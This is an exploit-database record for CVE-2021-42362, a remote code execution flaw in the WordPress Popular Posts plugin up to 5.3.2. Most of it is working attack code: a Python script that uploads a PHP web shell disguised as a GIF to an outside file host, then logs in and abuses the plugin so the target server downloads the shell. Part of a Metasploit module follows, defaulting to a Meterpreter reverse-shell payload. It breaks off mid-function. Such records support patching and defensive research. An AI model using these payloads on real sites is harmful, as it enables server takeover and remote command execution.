WordPress Plugin Popular Posts 5.3.2 - Remote Code Execution (RCE) (Authenticated)

2021-07-15T00:00:00

Description

{"id": "EDB-ID:50129", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "WordPress Plugin Popular Posts 5.3.2 - Remote Code Execution (RCE) (Authenticated)", "description": "", "published": "2021-07-15T00:00:00", "modified": "2021-07-15T00:00:00", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 6.5}, "severity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://www.exploit-db.com/exploits/50129", "reporter": "Simone Cristofaro", "references": [], "cvelist": ["2021-42362", "CVE-2021-42362"], "immutableFields": [], "lastseen": "2022-08-16T06:04:34", "viewCount": 730, "enchantments": {"dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2021-1096"]}, {"type": "cve", "idList": ["CVE-2021-42362"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:165376"]}, {"type": "patchstack", "idList": ["PATCHSTACK:062661746B8F95E15FCE7B0D84E63AB0"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:104BCB9FE21AA540C50BD81151F701D5"]}, {"type": "zdt", "idList": ["1337DAY-ID-37162"]}]}, "score": {"value": 0.5, "vector": "NONE"}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2021-1096"]}, {"type": "cve", "idList": ["CVE-2021-42362"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:165376"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:104BCB9FE21AA540C50BD81151F701D5"]}, {"type": "zdt", "idList": ["1337DAY-ID-37162"]}]}, "exploitation": null, "vulnersScore": 0.5}, "_state": {"dependencies": 1660629990, "score": 1660630726}, "_internal": {"score_hash": "c3d911eee580fb7c0b455d8752914ee5"}, "sourceHref": "https://www.exploit-db.com/download/50129", "sourceData": "# Exploit Title: WordPress Plugin Popular Posts 5.3.2 - Remote Code Execution (RCE) (Authenticated)\r\n# Date: 15/07/2021\r\n# Exploit Author: Simone Cristofaro\r\n# Vendor Homepage: https://it.wordpress.org/plugins/wordpress-popular-posts/\r\n# Software Link: https://downloads.wordpress.org/plugin/wordpress-popular-posts.5.3.2.zip\r\n# Version: 5.3.2 or below\r\n# Tested on: Debian 10, WordPress 5.7.2, PHP version 7.3.27\r\n# CVE: CVE-2021-42362\r\n# Reference: https://blog.nintechnet.com/improper-input-validation-fixed-in-wordpress-popular-posts-plugin/\r\n# Notes: It's required that the Popular Posts widget is active (ie. in the footer section) and gd extension for PHP is\r\n# enabled (otherwise WPP can't generate thumbnails). Also, the authenticated user must have \"Contributor\" role or above.\r\n\r\n# This script will login with the provided credentials, create a new post and add a custom field with the link to a\r\n# web shell, that will be automatically downloaded by the server. If you don't want to upload the file, you need to\r\n# provide a URL to a web shell with SSL support (https) and make sure it contains the file name in it. If the plugin is\r\n# set to show a fixed number of popular posts (ie. top 5), you just need to refresh the post page to make it go up ;)\r\n\r\n'''\r\nBanner:\r\n'''\r\nbanner = \"\"\"\r\n* Wordpress Popular Posts plugin <= 5.3.2 - RCE (Authenticated) \r\n* @Heisenberg\r\n\"\"\"\r\nprint(banner)\r\n\r\n'''\r\nImport required modules:\r\n'''\r\nimport requests\r\nimport argparse\r\nimport json\r\nimport re\r\n'''\r\nUser-Input:\r\n'''\r\nmy_parser = argparse.ArgumentParser(description='Wordpress Popular Posts plugin <= 5.3.2 - RCE (Authenticated)')\r\nmy_parser.add_argument('-t', help='--Target IP', metavar='IP', type=str, required=True, dest=\"target_ip\")\r\nmy_parser.add_argument('-p', help='--Target port', type=str, metavar='PORT', default='80', dest=\"target_port\")\r\nmy_parser.add_argument('-w', help='--Wordpress path (ie. /wordpress/)',metavar='PATH', type=str, required=True, dest=\"wp_path\")\r\nmy_parser.add_argument('-U', help='--Username', metavar='USER', type=str, required=True, dest=\"username\")\r\nmy_parser.add_argument('-P', help='--Password', metavar='PASS', type=str, required=True, dest=\"password\")\r\nargs = my_parser.parse_args()\r\ntarget_ip = args.target_ip\r\ntarget_port = args.target_port\r\nwp_path = args.wp_path\r\nusername = args.username\r\npassword = args.password\r\n\r\n''' \r\n# Hard coded parameters (if you don't like command line execution) \r\ntarget_ip = \"localhost\"\r\ntarget_port = \"80\"\r\nwp_path = \"/wordpress/\"\r\nusername = \"heisenberg\"\r\npassword = \"heisenberg\"\r\n'''\r\n\r\nshell_name = 'exploit.gif.php'\r\npayload = 'GIF <html> <body> <form method=\"GET\" name=\"<?php echo basename($_SERVER[\\'PHP_SELF\\']); ?>\"> <input type=\"TEXT\" name=\"cmd\" autofocus id=\"cmd\" size=\"80\"> <input type=\"SUBMIT\" value=\"Execute\"> </form> <pre> <?php if(isset($_GET[\\'cmd\\'])) { system($_GET[\\'cmd\\']); } ?> </pre> </body> </html>'\r\n\r\nprint('')\r\nprint('[*] Starting Exploit:')\r\n\r\n'''\r\nUpload file\r\n'''\r\nfile_json = requests.post('https://api.bayfiles.com/upload', files={ 'file' : (shell_name, payload)})\r\nresp = json.loads(file_json.text)\r\nif resp['status']:\r\n urlshort = resp['data']['file']['url']['full']\r\nelse:\r\n print(f'[-] Error:'+ resp['error']['message'])\r\n exit()\r\n\r\nfile_uploaded_site = requests.get(urlshort).text\r\nPHP_URL = re.findall(r\"(https?://\\S+)(\"+shell_name+\")\",file_uploaded_site)[0][0] + shell_name\r\n\r\nprint(f'[+] Web Shell successfully uploadad at [{PHP_URL}].')\r\n\r\n'''\r\nAuthentication:\r\n'''\r\nsession = requests.Session()\r\nauth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'\r\n\r\n# Header:\r\nheader = {\r\n 'Host': target_ip,\r\n 'User-Agent': 'Monies Browser 1.0',\r\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\r\n 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',\r\n 'Accept-Encoding': 'gzip, deflate',\r\n 'Content-Type': 'application/x-www-form-urlencoded',\r\n 'Origin': 'http://' + target_ip,\r\n 'Connection': 'close',\r\n 'Upgrade-Insecure-Requests': '1'\r\n}\r\n\r\n# Body:\r\nbody = {\r\n 'log': username,\r\n 'pwd': password,\r\n 'wp-submit': 'Log In',\r\n 'testcookie': '1'\r\n}\r\n\r\n# Authenticate:\r\nauth = session.post(auth_url, headers=header, data=body)\r\nauth_header = auth.headers['Set-Cookie']\r\nif 'wordpress_logged_in' in auth_header:\r\n print(f'[+] Authentication successfull as user [{username}] !')\r\nelse:\r\n print('[-] Authentication failed ! Check username and password')\r\n exit()\r\n\r\n'''\r\nVerify that the requirements are installed\r\n'''\r\nsettings_page_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/options-general.php?page=wordpress-popular-posts&tab=debug'\r\nsettings_page = session.get(settings_page_url).text\r\nsearch_string = ' gd'\r\nif settings_page.find(search_string) == -1 :\r\n print('[-] Error, gd extension for PHP is not installed/enabled on the server ! WPP can\\'t generate thumbnails.')\r\n exit()\r\n\r\n'''\r\nGet the wpp-admin-token\r\n'''\r\nsettings_page_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/options-general.php?page=wordpress-popular-posts&tab=tools'\r\n\r\nsettings_page = session.get(settings_page_url).text\r\nsearch_string = '<input type=\"hidden\" id=\"wpp-admin-token\" name=\"wpp-admin-token\" value=\"'\r\nsearch_string_end = '\" />'\r\nsettings_page = settings_page[settings_page.find(search_string):]\r\nwpp_admin_token = settings_page[72: settings_page.find(search_string_end)]\r\nif wpp_admin_token:\r\n print(f'[+] Acquired wpp-admin-token [{wpp_admin_token}].')\r\nelse:\r\n print('[-] Error while gathering wpp-admin-token !')\r\n exit()\r\n\r\n'''\r\nApply changes to the Popular Posts plugin\r\n'''\r\nbody = {\r\n 'upload_thumb_src': '',\r\n 'thumb_source': 'custom_field',\r\n 'thumb_lazy_load': 1,\r\n 'thumb_field': 'wpp_thumbnail',\r\n 'thumb_field_resize': 1,\r\n 'section': 'thumb',\r\n 'wpp-admin-token': wpp_admin_token\r\n}\r\napplied_changes = session.post(settings_page_url, headers=header, data=body).text\r\nif applied_changes.find('<div class=\"notice notice-success is-dismissible\"><p><strong>Settings saved.'):\r\n print(f'[+] Settings applied successfully to the Popular Posts plugin. ')\r\nelse:\r\n print('[-] Error while applying settings o the Popular Posts plugin!')\r\n exit()\r\n\r\n'''\r\nEmpty image cache\r\n'''\r\nbody = {\r\n 'action': 'wpp_clear_thumbnail',\r\n 'wpp-admin-token': wpp_admin_token\r\n}\r\napplied_changes = session.post(settings_page_url, headers=header, data=body).text\r\nprint(f'[+] Images cache cleared. ')\r\n\r\n\r\n'''\r\nGet the new post ID and Nonce\r\n'''\r\nnew_post_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/post-new.php'\r\n\r\nnew_post_page = session.get(new_post_url).text\r\nsearch_string = 'name=\"_ajax_nonce-add-meta\" value=\"'\r\nsearch_string_end = '\" />'\r\nnew_post_page = new_post_page[new_post_page.find(search_string)+35:]\r\najax_nonce = new_post_page[:new_post_page.find(search_string_end)]\r\n\r\nsearch_string = 'wp.apiFetch.nonceMiddleware = wp.apiFetch.createNonceMiddleware( \"'\r\nsearch_string_end = '\" );'\r\nnew_post_page = new_post_page[new_post_page.find(search_string)+66:]\r\nwp_nonce = new_post_page[:new_post_page.find(search_string_end)]\r\n\r\nsearch_string = '},\"post\":{\"id\":'\r\nsearch_string_end = ','\r\nnew_post_page = new_post_page[new_post_page.find(search_string)+15:]\r\npost_ID = new_post_page[:new_post_page.find(search_string_end)]\r\n\r\nif post_ID and wp_nonce and ajax_nonce:\r\n print(f'[+] Acquired new post ID [{post_ID}], WP Nonce [{wp_nonce}] and AJAX Nonce [{ajax_nonce}].')\r\nelse:\r\n if not post_ID: print('[-] Error while gathering post_ID !')\r\n elif not wp_nonce: print('[-] Error while gathering Wordpress Nonce !')\r\n elif not ajax_nonce : print('[-] Error while gathering Wordpress AJAX Nonce !')\r\n exit()\r\n\r\n'''\r\nPublish a new post\r\n'''\r\nnew_post_url = 'http://' + target_ip + ':' + target_port + wp_path + 'index.php/wp-json/wp/v2/posts/'+post_ID+'?_locale=user'\r\n\r\ndata = {\"id\":post_ID,\"title\":\"I'm the one who knocks\",\"content\":\"\\n<p>upgrade your plugins</p>\\n\",\"status\":\"publish\"}\r\nheader['X-WP-Nonce'] = wp_nonce\r\nheader['Content-Type'] = 'application/json'\r\nheader['X-HTTP-Method-Override'] = 'PUT'\r\nnew_post_page = session.post(new_post_url, headers=header, json=data).text\r\nif new_post_page.find('\"status\":\"publish\"'):\r\n print(f'[+] New post named [I\\'m the one who knocks] published correctly!')\r\nelse:\r\n print('[-] Error while publishing the new post !')\r\n exit()\r\n\r\n'''\r\nAdd the Custom Filed\r\n'''\r\nnew_post_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/admin-ajax.php'\r\n\r\nheader.pop('X-WP-Nonce')\r\nheader['Content-Type'] = 'application/x-www-form-urlencoded; charset=UTF-8'\r\nheader.pop('X-HTTP-Method-Override')\r\nheader['Accept']='*/*'\r\nheader['X-Requested-With'] = 'XMLHttpRequest'\r\nbody = {\r\n '_ajax_nonce': 0,\r\n 'action': 'add-meta',\r\n 'metakeyselect': 'wpp_thumbnail',\r\n 'metakeyinput': \"\",\r\n 'metavalue' : PHP_URL,\r\n '_ajax_nonce-add-meta': ajax_nonce,\r\n 'post_id' : post_ID\r\n}\r\nnew_post_page = session.post(new_post_url, headers=header, data=body).text\r\n\r\nif new_post_page.find(\"<tr id='meta-\") > 0:\r\n print(f'[+] Added a new Custom Field with the uploaded web shell.')\r\nelse:\r\n print('[-] Error while adding the custom field !')\r\n print(new_post_page)\r\n exit()\r\n\r\n'''\r\nGive it some views to pop it up in the recent posts\r\n'''\r\nprint(f'[+] Giving the new post some views (10) [ ', end=\"\")\r\n\r\nnew_post_url = 'http://' + target_ip + ':' + target_port + wp_path + 'index.php?page_id=' + post_ID\r\nredirect_url = session.get(new_post_url).url\r\n\r\nnew_post_plugin_url = 'http://' + target_ip + ':' + target_port + wp_path + 'index.php/wp-json/wordpress-popular-posts/v1/popular-posts'\r\ndata = {\r\n '_wpnonce': wp_nonce,\r\n 'wpp_id': post_ID,\r\n 'sampling': 0,\r\n 'sampling_rate': 100\r\n}\r\n\r\n\r\nfor progress in range(10):\r\n session.get(redirect_url)\r\n res = session.post(new_post_plugin_url, headers=header, data=data)\r\n print ('=', end='')\r\n\r\nprint(' ] '+json.loads(res.text)['results'])\r\n\r\nprint('[+] Exploit done !')\r\nprint(' -> Webshell: http://' + target_ip + ':' + target_port + wp_path + 'wp-content/uploads/wordpress-popular-posts/' + post_ID +'_'+ shell_name)\r\nprint('')", "osvdbidlist": [], "exploitType": "webapps", "verified": false}

{"checkpoint_advisories": [{"lastseen": "2022-03-07T15:28:58", "description": "An arbitrary file upload vulnerability exists in WordPress Popular Posts Plugin. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-07T00:00:00", "type": "checkpoint_advisories", "title": "WordPress Popular Posts Plugin Arbitrary File Upload (CVE-2021-42362)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42362"], "modified": "2022-03-07T00:00:00", "id": "CPAI-2021-1096", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2021-12-20T23:46:53", "description": "This exploit requires Metasploit to have a FQDN and the ability to run a payload web server on port 80, 443, or 8080. The FQDN must also not resolve to a reserved address (192/172/127/10). The server must also respond to a HEAD request for the payload, prior to getting a GET request. This exploit leverages an authenticated improper input validation in WordPress plugin Popular Posts versions 5.3.2 and below. The exploit chain is rather complicated. Authentication is required and gd for PHP is required on the server. Then the Popular Post plugin is reconfigured to allow for an arbitrary URL for the post image in the widget. A post is made, then requests are sent to the post to make it more popular than the previous #1 by 5. Once the post hits the top 5, and after a 60 second server cache refresh (the exploit waits 90 seconds), the homepage widget is loaded which triggers the plugin to download the payload from the server. The payload has a GIF header, and a double extension (.gif.php) allowing for arbitrary PHP code to be executed.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-20T00:00:00", "type": "zdt", "title": "WordPress Popular Posts 5.3.2 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42362"], "modified": "2021-12-20T00:00:00", "id": "1337DAY-ID-37162", "href": "https://0day.today/exploit/description/37162", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::FileDropper\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::Remote::HTTP::Wordpress\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Wordpress Popular Posts Authenticated RCE',\n 'Description' => %q{\n This exploit requires Metasploit to have a FQDN and the ability to run a payload web server on port 80, 443, or 8080.\n The FQDN must also not resolve to a reserved address (192/172/127/10). The server must also respond to a HEAD request\n for the payload, prior to getting a GET request.\n This exploit leverages an authenticated improper input validation in Wordpress plugin Popular Posts <= 5.3.2.\n The exploit chain is rather complicated. Authentication is required and 'gd' for PHP is required on the server.\n Then the Popular Post plugin is reconfigured to allow for an arbitrary URL for the post image in the widget.\n A post is made, then requests are sent to the post to make it more popular than the previous #1 by 5. Once\n the post hits the top 5, and after a 60sec (we wait 90) server cache refresh, the homepage widget is loaded\n which triggers the plugin to download the payload from our server. Our payload has a 'GIF' header, and a\n double extension ('.gif.php') allowing for arbitrary PHP code to be executed.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'h00die', # msf module\n 'Simone Cristofaro', # edb\n 'Jerome Bruandet' # original analysis\n ],\n 'References' => [\n [ 'EDB', '50129' ],\n [ 'URL', 'https://blog.nintechnet.com/improper-input-validation-fixed-in-wordpress-popular-posts-plugin/' ],\n [ 'WPVDB', 'bd4f157c-a3d7-4535-a587-0102ba4e3009' ],\n [ 'URL', 'https://plugins.trac.wordpress.org/changeset/2542638' ],\n [ 'URL', 'https://github.com/cabrerahector/wordpress-popular-posts/commit/d9b274cf6812eb446e4103cb18f69897ec6fe601' ],\n [ 'CVE', '2021-42362' ]\n ],\n 'Platform' => ['php'],\n 'Stance' => Msf::Exploit::Stance::Aggressive,\n 'Privileged' => false,\n 'Arch' => ARCH_PHP,\n 'Targets' => [\n [ 'Automatic Target', {}]\n ],\n 'DisclosureDate' => '2021-06-11',\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'php/meterpreter/reverse_tcp',\n 'WfsDelay' => 3000 # 50 minutes, other visitors to the site may trigger\n },\n 'Notes' => {\n 'Stability' => [ CRASH_SAFE ],\n 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, CONFIG_CHANGES ],\n 'Reliability' => [ REPEATABLE_SESSION ]\n }\n )\n )\n\n register_options [\n OptString.new('USERNAME', [true, 'Username of the account', 'admin']),\n OptString.new('PASSWORD', [true, 'Password of the account', 'admin']),\n OptString.new('TARGETURI', [true, 'The base path of the Wordpress server', '/']),\n # https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L560\n OptString.new('SRVHOSTNAME', [true, 'FQDN of the metasploit server. Must not resolve to a reserved address (192/10/127/172)', '']),\n # https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L584\n OptEnum.new('SRVPORT', [true, 'The local port to listen on.', 'login', ['80', '443', '8080']]),\n ]\n end\n\n def check\n return CheckCode::Safe('Wordpress not detected.') unless wordpress_and_online?\n\n checkcode = check_plugin_version_from_readme('wordpress-popular-posts', '5.3.3')\n if checkcode == CheckCode::Safe\n print_error('Popular Posts not a vulnerable version')\n end\n return checkcode\n end\n\n def trigger_payload(on_disk_payload_name)\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path),\n 'keep_cookies' => 'true'\n )\n # loop this 5 times just incase there is a time delay in writing the file by the server\n (1..5).each do |i|\n print_status(\"Triggering shell at: #{normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wordpress-popular-posts', on_disk_payload_name)} in 10 seconds. Attempt #{i} of 5\")\n Rex.sleep(10)\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wordpress-popular-posts', on_disk_payload_name),\n 'keep_cookies' => 'true'\n )\n end\n if res && res.code == 404\n print_error('Failed to find payload, may not have uploaded correctly.')\n end\n end\n\n def on_request_uri(cli, request, payload_name, post_id)\n if request.method == 'HEAD'\n print_good('Responding to initial HEAD request (passed check 1)')\n # according to https://stackoverflow.com/questions/3854842/content-length-header-with-head-requests we should have a valid Content-Length\n # however that seems to be calculated dynamically, as it is overwritten to 0 on this response. leaving here as notes.\n # also didn't want to send the true payload in the body to make the size correct as that gives a higher chance of us getting caught\n return send_response(cli, '', { 'Content-Type' => 'image/gif', 'Content-Length' => \"GIF#{payload.encoded}\".length.to_s })\n end\n if request.method == 'GET'\n on_disk_payload_name = \"#{post_id}_#{payload_name}\"\n register_file_for_cleanup(on_disk_payload_name)\n print_good('Responding to GET request (passed check 2)')\n send_response(cli, \"GIF#{payload.encoded}\", 'Content-Type' => 'image/gif')\n close_client(cli) # for some odd reason we need to close the connection manually for PHP/WP to finish its functions\n Rex.sleep(2) # wait for WP to finish all the checks it needs\n trigger_payload(on_disk_payload_name)\n end\n print_status(\"Received unexpected #{request.method} request\")\n end\n\n def check_gd_installed(cookie)\n vprint_status('Checking if gd is installed')\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'),\n 'method' => 'GET',\n 'cookie' => cookie,\n 'keep_cookies' => 'true',\n 'vars_get' => {\n 'page' => 'wordpress-popular-posts',\n 'tab' => 'debug'\n }\n )\n fail_with(Failure::Unreachable, 'Site not responding') unless res\n fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200\n res.body.include? ' gd'\n end\n\n def get_wpp_admin_token(cookie)\n vprint_status('Retrieving wpp_admin token')\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'),\n 'method' => 'GET',\n 'cookie' => cookie,\n 'keep_cookies' => 'true',\n 'vars_get' => {\n 'page' => 'wordpress-popular-posts',\n 'tab' => 'tools'\n }\n )\n fail_with(Failure::Unreachable, 'Site not responding') unless res\n fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200\n /<input type=\"hidden\" id=\"wpp-admin-token\" name=\"wpp-admin-token\" value=\"([^\"]*)/ =~ res.body\n Regexp.last_match(1)\n end\n\n def change_settings(cookie, token)\n vprint_status('Updating popular posts settings for images')\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'),\n 'method' => 'POST',\n 'cookie' => cookie,\n 'keep_cookies' => 'true',\n 'vars_get' => {\n 'page' => 'wordpress-popular-posts',\n 'tab' => 'debug'\n },\n 'vars_post' => {\n 'upload_thumb_src' => '',\n 'thumb_source' => 'custom_field',\n 'thumb_lazy_load' => 0,\n 'thumb_field' => 'wpp_thumbnail',\n 'thumb_field_resize' => 1,\n 'section' => 'thumb',\n 'wpp-admin-token' => token\n }\n )\n fail_with(Failure::Unreachable, 'Site not responding') unless res\n fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200\n fail_with(Failure::UnexpectedReply, 'Unable to save/change settings') unless /<strong>Settings saved/ =~ res.body\n end\n\n def clear_cache(cookie, token)\n vprint_status('Clearing image cache')\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'),\n 'method' => 'POST',\n 'cookie' => cookie,\n 'keep_cookies' => 'true',\n 'vars_get' => {\n 'page' => 'wordpress-popular-posts',\n 'tab' => 'debug'\n },\n 'vars_post' => {\n 'action' => 'wpp_clear_thumbnail',\n 'wpp-admin-token' => token\n }\n )\n fail_with(Failure::Unreachable, 'Site not responding') unless res\n fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200\n end\n\n def enable_custom_fields(cookie, custom_nonce, post)\n # this should enable the ajax_nonce, it will 302 us back to the referer page as well so we can get it.\n res = send_request_cgi!(\n 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'post.php'),\n 'cookie' => cookie,\n 'keep_cookies' => 'true',\n 'method' => 'POST',\n 'vars_post' => {\n 'toggle-custom-fields-nonce' => custom_nonce,\n '_wp_http_referer' => \"#{normalize_uri(target_uri.path, 'wp-admin', 'post.php')}?post=#{post}&action=edit\",\n 'action' => 'toggle-custom-fields'\n }\n )\n /name=\"_ajax_nonce-add-meta\" value=\"([^\"]*)/ =~ res.body\n Regexp.last_match(1)\n end\n\n def create_post(cookie)\n vprint_status('Creating new post')\n # get post ID and nonces\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'post-new.php'),\n 'cookie' => cookie,\n 'keep_cookies' => 'true'\n )\n fail_with(Failure::Unreachable, 'Site not responding') unless res\n fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200\n /name=\"_ajax_nonce-add-meta\" value=\"(?<ajax_nonce>[^\"]*)/ =~ res.body\n /wp.apiFetch.nonceMiddleware = wp.apiFetch.createNonceMiddleware\\( \"(?<wp_nonce>[^\"]*)/ =~ res.body\n /},\"post\":{\"id\":(?<post_id>\\d*)/ =~ res.body\n if ajax_nonce.nil?\n print_error('missing ajax nonce field, attempting to re-enable. if this fails, you may need to change the interface to enable this. See https://www.hostpapa.com/knowledgebase/add-custom-meta-boxes-wordpress-posts/. Or check (while writing a post) Options > Preferences > Panels > Additional > Custom Fields.')\n /name=\"toggle-custom-fields-nonce\" value=\"(?<custom_nonce>[^\"]*)/ =~ res.body\n ajax_nonce = enable_custom_fields(cookie, custom_nonce, post_id)\n end\n unless ajax_nonce.nil?\n vprint_status(\"ajax nonce: #{ajax_nonce}\")\n end\n unless wp_nonce.nil?\n vprint_status(\"wp nonce: #{wp_nonce}\")\n end\n unless post_id.nil?\n vprint_status(\"Created Post: #{post_id}\")\n end\n fail_with(Failure::UnexpectedReply, 'Unable to retrieve nonces and/or new post id') unless ajax_nonce && wp_nonce && post_id\n\n # publish new post\n vprint_status(\"Writing content to Post: #{post_id}\")\n # this is very different from the EDB POC, I kept getting 200 to the home page with their example, so this is based off what the UI submits\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'method' => 'POST',\n 'cookie' => cookie,\n 'keep_cookies' => 'true',\n 'ctype' => 'application/json',\n 'accept' => 'application/json',\n 'vars_get' => {\n '_locale' => 'user',\n 'rest_route' => normalize_uri(target_uri.path, 'wp', 'v2', 'posts', post_id)\n },\n 'data' => {\n 'id' => post_id,\n 'title' => Rex::Text.rand_text_alphanumeric(20..30),\n 'content' => \"\\n<p>#{Rex::Text.rand_text_alphanumeric(100..200)}</p>\\n\",\n 'status' => 'publish'\n }.to_json,\n 'headers' => {\n 'X-WP-Nonce' => wp_nonce,\n 'X-HTTP-Method-Override' => 'PUT'\n }\n )\n\n fail_with(Failure::Unreachable, 'Site not responding') unless res\n fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200\n fail_with(Failure::UnexpectedReply, 'Post failed to publish') unless res.body.include? '\"status\":\"publish\"'\n return post_id, ajax_nonce, wp_nonce\n end\n\n def add_meta(cookie, post_id, ajax_nonce, payload_name)\n payload_url = \"http://#{datastore['SRVHOSTNAME']}:#{datastore['SRVPORT']}/#{payload_name}\"\n vprint_status(\"Adding malicious metadata for redirect to #{payload_url}\")\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),\n 'method' => 'POST',\n 'cookie' => cookie,\n 'keep_cookies' => 'true',\n 'vars_post' => {\n '_ajax_nonce' => 0,\n 'action' => 'add-meta',\n 'metakeyselect' => 'wpp_thumbnail',\n 'metakeyinput' => '',\n 'metavalue' => payload_url,\n '_ajax_nonce-add-meta' => ajax_nonce,\n 'post_id' => post_id\n }\n )\n fail_with(Failure::Unreachable, 'Site not responding') unless res\n fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200\n fail_with(Failure::UnexpectedReply, 'Failed to update metadata') unless res.body.include? \"<tr id='meta-\"\n end\n\n def boost_post(cookie, post_id, wp_nonce, post_count)\n # redirect as needed\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'keep_cookies' => 'true',\n 'cookie' => cookie,\n 'vars_get' => { 'page_id' => post_id }\n )\n fail_with(Failure::Unreachable, 'Site not responding') unless res\n 